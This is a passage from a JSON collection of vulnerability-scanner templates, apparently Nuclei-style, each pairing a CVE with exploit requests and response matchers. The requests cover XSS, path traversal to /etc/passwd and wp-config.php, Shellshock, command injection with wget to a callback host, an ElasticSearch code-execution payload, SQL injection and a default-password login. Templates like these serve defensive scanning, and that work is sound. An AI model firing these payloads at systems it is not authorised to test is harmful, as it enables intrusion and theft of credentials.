Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6668","info":{"name":"nweb2fax <=0.2.7 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd","{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-1059","info":{"name":"WordPress Sniplets 1.1.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6080","info":{"name":"Joomla! ionFiles 4.4.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-6982","info":{"name":"Devalcms 1.4a - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sub menu for: <script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2008-5587","info":{"name":"phpPgAdmin <=4.2.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-4668","info":{"name":"Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-2650","info":{"name":"CMSimple 3.1 - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2008-1547","info":{"name":"Microsoft OWA Exchange Server 2003 - 'redir.asp' Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/exchweb/bin/redir.asp?URL=https://interact.sh","{{BaseURL}}/CookieAuth.dll?GetLogon?url=%2Fexchweb%2Fbin%2Fredir.asp%3FURL%3Dhttps%3A%2F%2Finteract.sh&reason=0"],"stop-at-first-match":true,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2014-4592","info":{"name":"WP Planet <= 0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins//wp-planet/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/wp-planet/rss.class/scripts/magpie_debug.php?url=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["WP Planet"]},{"type":"word","part":"body_2","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header_2","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2962","info":{"name":"Belkin N150 Router 1.00.08/1.00.09 - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3206","info":{"name":"Seagate BlackArmor NAS - Command Injection","severity":"critical"},"requests":[{"raw":["GET /backupmgt/localJob.php?session=fail;wget http://{{interactsh-url}}; HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://{{interactsh-url}}; HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"unsafe":true,"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2014-4535","info":{"name":"Import Legacy Media <= 0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4942","info":{"name":"WordPress EasyCart <2.0.6 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-easycart/inc/admin/phpinfo.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PHP Extension","PHP Version"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","part":"body","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"]}]}]},{"id":"CVE-2014-6271","info":{"name":"ShellShock - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}","{{BaseURL}}/cgi-bin/status","{{BaseURL}}/cgi-bin/stats","{{BaseURL}}/cgi-bin/test","{{BaseURL}}/cgi-bin/status/status.cgi","{{BaseURL}}/test.cgi","{{BaseURL}}/debug.cgi","{{BaseURL}}/cgi-bin/test-cgi"],"stop-at-first-match":true,"headers":{"Shellshock":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd ","Referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd ","Cookie":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2383","info":{"name":"Dompdf < v0.6.0 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/web-portal-lite-client-portal-secure-file-sharing-private-messaging/includes/libs/pdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/buddypress-component-stats/lib/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/abstract-submission/dompdf-0.5.1/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/post-pdf-export/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/blogtopdf/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/gboutique/library/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd","{{BaseURL}}/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php?input_file=php://filter/resource=/etc/passwd"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/pdf","filename=\"dompdf_out.pdf\""],"condition":"and"},{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-8676","info":{"name":"Simple Online Planning Tool <1.3.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/process/feries.php?fichier=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-8682","info":{"name":"Gogs (Go Git Service) - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"ok\":true","\"data\"","\"repolink\":\""],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9606","info":{"name":"Netsweeper 4.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/policy/category_table_ajax.php?customctid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9094","info":{"name":"WordPress DZS-VideoGallery Plugin Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4513","info":{"name":"ActiveHelper LiveHelp Server 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</textarea></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5368","info":{"name":"WordPress Plugin WP Content Source Control - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-1203","info":{"name":"Eyou E-Mail <3.6 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntype='|cat /etc/passwd||'\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9607","info":{"name":"Netsweeper 4.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remotereporter/load_logfiles.php?server=018192&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9444","info":{"name":"Frontend Uploader <= 0.9.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4210","info":{"name":"Oracle Weblogic - SSRF in SearchPublicRegistries.jsp","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9617","info":{"name":"Netsweeper 3.0.6 - Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2014-9615","info":{"name":"Netsweeper 4.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/deny/index.php?dpid=1&dpruleid=1&cat=1&ttl=5018400&groupname=<group_name_eg_netsweeper_student_allow_internet_access&policyname=auto_created&username=root&userip=127.0.0.1&connectionip=127.0.0.1&nsphostname=netsweeper&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2908","info":{"name":"Siemens SIMATIC S7-1200 CPU - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&Send=Filter"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9119","info":{"name":"WordPress DB Backup <=4.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4558","info":{"name":"WooCommerce Swipe <= 2.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3120","info":{"name":"ElasticSearch v1.1.1/1.2 RCE","severity":"medium"},"requests":[{"raw":["POST /_search?pretty HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: application/x-www-form-urlencoded\n\n{\n    \"size\": 1,\n    \"query\": {\n      \"filtered\": {\n        \"query\": {\n          \"match_all\": {\n          }\n        }\n      }\n    },\n    \"script_fields\": {\n        \"command\": {\n            \"script\": \"import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\"cat /etc/passwd\\\").getInputStream()).useDelimiter(\\\"\\\\\\\\A\\\").next();\"\n        }\n    }\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4940","info":{"name":"WordPress Plugin Tera Charts - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-10037","info":{"name":"DomPHP 0.83 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-6287","info":{"name":"HTTP File Server <2.3c - Remote Command Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?search==%00{.cookie|{{str1}}|value%3d{{str2}}.}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>HFS /</title>"]},{"type":"word","part":"header","words":["Set-Cookie: {{str1}}={{str2}};","text/html"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4550","info":{"name":"Shortcode Ninja <= 1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5258","info":{"name":"webEdition 6.3.8.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webEdition/showTempFile.php?file=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-8799","info":{"name":"WordPress Plugin DukaPress 2.5.2 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD","DB_USER","DB_HOST"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4539","info":{"name":"Movies <= 0.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.cookie)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9618","info":{"name":"Netsweeper - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/clientlogin/?srid=&action=showdeny&url="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["name=formtag action=\"../clientlogin/?srid=&action=showdeny&url=\"","placeholder=\"Profile Manager\">","<title>Netsweeper WebAdmin</title>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2323","info":{"name":"Lighttpd 1.4.34 SQL Injection and Path Traversal","severity":"critical"},"requests":[{"raw":["GET /etc/passwd HTTP/1.1\nHost: [::1]' UNION SELECT '/\n\n"],"unsafe":true,"matchers":[{"type":"regex","regex":["root:[x*]:0:0:"]}]}]},{"id":"CVE-2014-9614","info":{"name":"Netsweeper 4.0.5 - Default Weak Account","severity":"critical"},"requests":[{"raw":["POST /webadmin/auth/verification.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}/webadmin/start/\n\nlogin=branding&password=branding&Submit=Login\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: ../common/","Location: ../start/"],"condition":"or"},{"type":"word","part":"header","words":["Set-Cookie: webadminU="]},{"type":"status","status":[302]}]}]},{"id":"CVE-2014-9609","info":{"name":"Netsweeper 4.0.8 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/reporter/view_server_log.php?act=stats&filename=log&offset=1&count=1&sortorder=0&filter=0&log=../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9608","info":{"name":"Netsweeper 4.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/policy/group_table_ajax.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["webadminU=","webadmin="],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4544","info":{"name":"Podcast Channels < 0.28 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3704","info":{"name":"Drupal SQL Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/?q=node&destination=node"],"body":"pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5({{num}})),1)%23]=bob&name[0]=a","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PDOException","{{md5({{num}})}}"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2014-2321","info":{"name":"ZTE Cable Modem Web Shell","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/web_shell_cmd.gch"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["please input shell command","ZTE Corporation. All rights reserved"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5111","info":{"name":"Fonality trixbox - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/maint/modules/endpointcfg/endpointcfg.php?lang=../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4561","info":{"name":"Ultimate Weather Plugin <= 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3744","info":{"name":"Node.js st module Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-6308","info":{"name":"Osclass Security Advisory 3.4.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/osclass/oc-admin/index.php?page=appearance&action=render&file=../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4536","info":{"name":"Infusionsoft Gravity Forms Add-on < 1.5.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2005-3344","info":{"name":"Horde Groupware Unauthenticated Admin Access","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/horde/admin/user.php","{{BaseURL}}/admin/user.php"],"headers":{"Content-Type":"text/html"},"matchers-condition":"and","matchers":[{"type":"word","words":["<title>Horde :: User Administration</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2005-4385","info":{"name":"Cofax <=2.0RC3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'>\"</script><script>alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2005-3634","info":{"name":"SAP Web Application Server 6.x/7.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sap/bc/BSp/sap/menu/fameset.htm?sap--essioncmd=close&sapexiturl=https%3a%2f%2finteract.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2005-2428","info":{"name":"Lotus Domino R5 and R6 WebMail - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/names.nsf/People?OpenView"],"matchers-condition":"and","matchers":[{"type":"regex","name":"domino-username","part":"body","regex":["(<a href=\"/names\\.nsf/[0-9a-z\\/]+\\?OpenDocument)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10148","info":{"name":"SolarWinds Orion API - Auth Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/web.config.i18n.ashx?l={{string}}&v={{string}}","{{BaseURL}}/SWNetPerfMon.db.i18n.ashx?l={{string}}&v={{string}}"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["SolarWinds.Orion.Core.","Connection String"],"condition":"or"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-10547","info":{"name":"rConfig 3.9.4 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["[project-discovery]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2020-2103","info":{"name":"Jenkins <=2.218 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: {{Hostname}}\n","GET {{BaseURL}}/whoAmI/ HTTP/1.1\nHost: 